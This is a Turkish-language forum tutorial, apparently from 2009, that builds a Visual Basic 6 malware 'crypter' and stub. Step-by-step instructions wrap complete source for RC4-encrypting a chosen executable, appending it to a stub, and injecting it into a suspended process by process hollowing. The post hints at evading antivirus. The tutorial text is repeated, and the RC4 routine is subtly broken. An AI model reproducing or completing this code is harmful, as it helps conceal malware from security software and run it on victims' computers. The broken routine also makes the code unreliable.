Eved degerli arkadaşlarım umarım yayralı bir paylasım olur
ÖNCELİKLE PC NİZE VİSUAL BASİC 6 İNDİRİNİZ VE INDIRDIGIMIZ PROGRAMI ACIYORUZ
Formumuza bir adet 2 det text 2 adet buton ve bir aden Commondialog koyucaz
Commondiaolugu formumuza yerlerştirmek icin GÖRMÜŞ OLDUGUNUZ SİMGELERİN BOS BİR YERE GELİP
MAUSA SOL TIKLAYIP COMPONENTS.. TIKLIYARAK Microsoft Common Dialog secıcez ve ordaki simgelere geldiğini görecez ve o commonu formumuza koyucaz
VE DAHA SONRA COMMON1 YAZAN BUTONUN UZERINE CIFT TIKLIYARAK AŞŞADAKİ VERİCEGIM KODU YAPISDIRACAKSINIZ
Ve ardından ikinci butonumuza cift tıklıyarak aşşadaki kodu yapıstırıyorsunuz
Ve yukarıdaki kodun hemen altını aşşadaki kodu yapıstırıyoruz
VE VİSUAL BASIC EN UST KOSESINDEKI FILE TIKLAYIP
Make.Project1.exe tıklıyarak kaydedecegimiz yeri belirliyoruz
Ve crypterımızı hazırladık simdik sıra stubumuzda.
Visual basıc tekrarar tıklıyarak stubumuzun kodlarını koyucaz.
sag ust kosede bulunan Form1 uzerıne gelerek removeform1 dıyoruz ve hemen ardından orada faremızın sol tusuna basarak Add seceneginden module tıklıyoz
yine aynı işlemi yaparak bir module daha secıyoruz ve modulerımızın ısımlerını degıstırıyoruz
MODULUMUZUN ISMINI Name yazan yerde webcetesi olarak degişiyoruz
Ve yukarıdakı ıkıncı modulumızın ısmını de Memoria olarak degişiyoruz ve
webcetesi olan modulumuzun uzerıne cift tıklayarak
su kodu yazıyoruz
Ve daha sonra Memoria olan modulumuzun üzerine cift tıklıyarak
aşşadaki kodları yazıcaz .
Bu arada devamını okumak için aşada kösede tesekur butonuna basıp ıkı uc kelime yazmanız lazım xD
File ye tıklıyarak
Make.webcetesi.exe olarak masa uzerıne kaydediyoruz
Crypterimiz Adı : Project1.exe **** dılersenız degıstırebılırsınız
Stubumuzun ısmı ıse : webcetesi.exe dir bunu degıtıremezsınız
Eved arkadaşlar umarım yararlı bır paylasım oldu .
ve son olarakda ben bu konuyu acarken bır gun sonra kızım amelıyat olucak sizlerden kızm için dua etmenizi dilerim.
ÖNCELİKLE PC NİZE VİSUAL BASİC 6 İNDİRİNİZ VE INDIRDIGIMIZ PROGRAMI ACIYORUZ
![6651.bmp](http://i0912.hizliresim.com/2009/12/23/6651.bmp)
Formumuza bir adet 2 det text 2 adet buton ve bir aden Commondialog koyucaz
Commondiaolugu formumuza yerlerştirmek icin GÖRMÜŞ OLDUGUNUZ SİMGELERİN BOS BİR YERE GELİP
MAUSA SOL TIKLAYIP COMPONENTS.. TIKLIYARAK Microsoft Common Dialog secıcez ve ordaki simgelere geldiğini görecez ve o commonu formumuza koyucaz
VE DAHA SONRA COMMON1 YAZAN BUTONUN UZERINE CIFT TIKLIYARAK AŞŞADAKİ VERİCEGIM KODU YAPISDIRACAKSINIZ
Private Sub Command1_Click()
With CommonDialog1
.DialogTitle = "Dosyanızı seçiniz!"
.Filter = "Aplicaciones EXE|*.exe"
.ShowOpen
End With
If Not CommonDialog1.FileName = vbNullString Then
Text1.Text = CommonDialog1.FileName
MsgBox "Dosyayı Sectiniz", vbInformation, Me.Caption
End If
End Sub
Ve ardından ikinci butonumuza cift tıklıyarak aşşadaki kodu yapıstırıyorsunuz
Private Sub Command2_Click()
Dim webcetesi As String, Archivo As String
If Text1.Text = vbNullString Then
MsgBox "Anti-av.org Farkı", vbExclamation, Me.Caption
Exit Sub
Else
Open App.Path & "\webcetesi.exe" For Binary As #1
webcetesi = Space(LOF(1))
Get #1, , webcetesi
Close #1
Open Text1.Text For Binary As #1
Archivo = Space(LOF(1))
Get #1, , Archivo
Close #1
With CommonDialog1
.DialogTitle = "Selecione la ruta donde guardar el archivo encriptado!"
.Filter = "Aplicaciones EXE|*.exe"
.ShowSave
End With
If Not CommonDialog1.FileName = vbNullString Then
Archivo = RC4(Archivo, Text2.Text)
Open CommonDialog1.FileName For Binary As #1
Put #1, , webcetesi & "##$$##" & Archivo & "##$$##" & Text2.Text & "##$$##"
Close #1
MsgBox "Neyi Nerden Ögrendiğini Hiç bir zaman ınkar etme [webcetesi]", vbInformation, Me.Caption
End If
End If
End Sub
Ve yukarıdaki kodun hemen altını aşşadaki kodu yapıstırıyoruz
Public Function RC4(ByVal Data As String, ByVal Password As String) As String
On Error Resume Next
Dim F(0 To 255) As Integer, X, Y As Long, Key() As Byte
Key() = StrConv(Password, vbFromUnicode)
For X = 0 To 255
Y = (Y + F(X) + Key(X Mod Len(Password))) Mod 256
F(X) = X
Next X
Key() = StrConv(Data, vbFromUnicode)
For X = 0 To Len(Data)
Y = (Y + F(Y) + 1) Mod 256
Key(X) = Key(X) Xor F(Temp + F((Y + F(Y)) Mod 254))
Next X
RC4 = StrConv(Key, vbUnicode)
End Function
VE VİSUAL BASIC EN UST KOSESINDEKI FILE TIKLAYIP
![6674.bmp](http://i0912.hizliresim.com/2009/12/23/6674.bmp)
Make.Project1.exe tıklıyarak kaydedecegimiz yeri belirliyoruz
Ve crypterımızı hazırladık simdik sıra stubumuzda.
Visual basıc tekrarar tıklıyarak stubumuzun kodlarını koyucaz.
![6679.bmp](http://i0912.hizliresim.com/2009/12/23/6679.bmp)
sag ust kosede bulunan Form1 uzerıne gelerek removeform1 dıyoruz ve hemen ardından orada faremızın sol tusuna basarak Add seceneginden module tıklıyoz
yine aynı işlemi yaparak bir module daha secıyoruz ve modulerımızın ısımlerını degıstırıyoruz
![6684.bmp](http://i0912.hizliresim.com/2009/12/23/6684.bmp)
MODULUMUZUN ISMINI Name yazan yerde webcetesi olarak degişiyoruz
![6689.bmp](http://i0912.hizliresim.com/2009/12/23/6689.bmp)
Ve yukarıdakı ıkıncı modulumızın ısmını de Memoria olarak degişiyoruz ve
webcetesi olan modulumuzun uzerıne cift tıklayarak
su kodu yazıyoruz
Sub Main()
Dim YO As String, Datos As String, sData() As String
YO = App.Path & "\" & App.EXEName & ".exe"
Open YO For Binary As #1
Datos = Space(LOF(1))
Get #1, , Datos
Close #1
sData() = Split(Datos, "##$$##")
sData(1) = RC4(sData(1), sData(2))
Injec YO, StrConv(sData(1), vbFromUnicode), vbNullString
End Sub
Public Function RC4(ByVal Data As String, ByVal Password As String) As String
On Error Resume Next
Dim F(0 To 255) As Integer, X, Y As Long, Key() As Byte
Key() = StrConv(Password, vbFromUnicode)
For X = 0 To 255
Y = (Y + F(X) + Key(X Mod Len(Password))) Mod 256
F(X) = X
Next X
Key() = StrConv(Data, vbFromUnicode)
For X = 0 To Len(Data)
Y = (Y + F(Y) + 1) Mod 256
Key(X) = Key(X) Xor F(Temp + F((Y + F(Y)) Mod 254))
Next X
RC4 = StrConv(Key, vbUnicode)
End Function
Ve daha sonra Memoria olan modulumuzun üzerine cift tıklıyarak
aşşadaki kodları yazıcaz .
Bu arada devamını okumak için aşada kösede tesekur butonuna basıp ıkı uc kelime yazmanız lazım xD
Ve son olarakdaOption Explicit
Private Const CONTEXT_FULL As Long = &H10007
Private Const MAX_PATH As Integer = 260
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long
Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type
Private Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type
Private Type CONTEXT
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As FLOATING_SAVE_AREA
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type
Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type
Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Private Type IMAGE_SECTION_HEADER
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRe********s As Long
PointerToLinenumbers As Long
NumberOfRe********s As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type
Private Function CallAPI(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
Dim lPtr As Long
Dim bvASM(&HEC00& - 1) As Byte
Dim i As Long
Dim lMod As Long
lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
If lMod = 0 Then Exit Function
lPtr = VarPtr(bvASM(0))
RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2
For i = UBound(Params) To 0 Step -1
RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4
Next
RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1
CallAPI = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
End Function
Public Sub Injec(ByVal sHost As String, ByRef bvBuff() As Byte, parameter As String)
Dim i As Long
Dim Pidh As IMAGE_DOS_HEADER
Dim Pinh As IMAGE_NT_HEADERS
Dim Pish As IMAGE_SECTION_HEADER
Dim Si As STARTUPINFO
Dim Pi As PROCESS_INFORMATION
Dim Ctx As CONTEXT
Si.cb = Len(Si)
RtlMoveMemory Pidh, bvBuff(0), 64
RtlMoveMemory Pinh, bvBuff(Pidh.e_lfanew), 248
CreateProcessA sHost, " " & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi
CallAPI "ntdll", "NtUnmapViewOfSection", Pi.hProcess, Pinh.OptionalHeader.ImageBase
CallAPI "kernel32", "VirtualAllocEx", Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase, bvBuff(0), Pinh.OptionalHeader.SizeOfHeaders, 0
For i = 0 To Pinh.FileHeader.NumberOfSections - 1
RtlMoveMemory Pish, bvBuff(Pidh.e_lfanew + 248 + 40 * i), Len(Pish)
WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, bvBuff(Pish.PointerToRawData), Pish.SizeOfRawData, 0
Next i
Ctx.ContextFlags = CONTEXT_FULL
CallAPI "kernel32", "GetThreadContext", Pi.hThread, VarPtr(Ctx)
WriteProcessMemory Pi.hProcess, ByVal Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0
Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
CallAPI "kernel32", "SetThreadContext", Pi.hThread, VarPtr(Ctx)
CallAPI "kernel32", "ResumeThread", Pi.hThread
End Sub
![6693.bmp](http://i0912.hizliresim.com/2009/12/23/6693.bmp)
File ye tıklıyarak
Make.webcetesi.exe olarak masa uzerıne kaydediyoruz
Crypterimiz Adı : Project1.exe **** dılersenız degıstırebılırsınız
Stubumuzun ısmı ıse : webcetesi.exe dir bunu degıtıremezsınız
Eved arkadaşlar umarım yararlı bır paylasım oldu .
ve son olarakda ben bu konuyu acarken bır gun sonra kızım amelıyat olucak sizlerden kızm için dua etmenizi dilerim.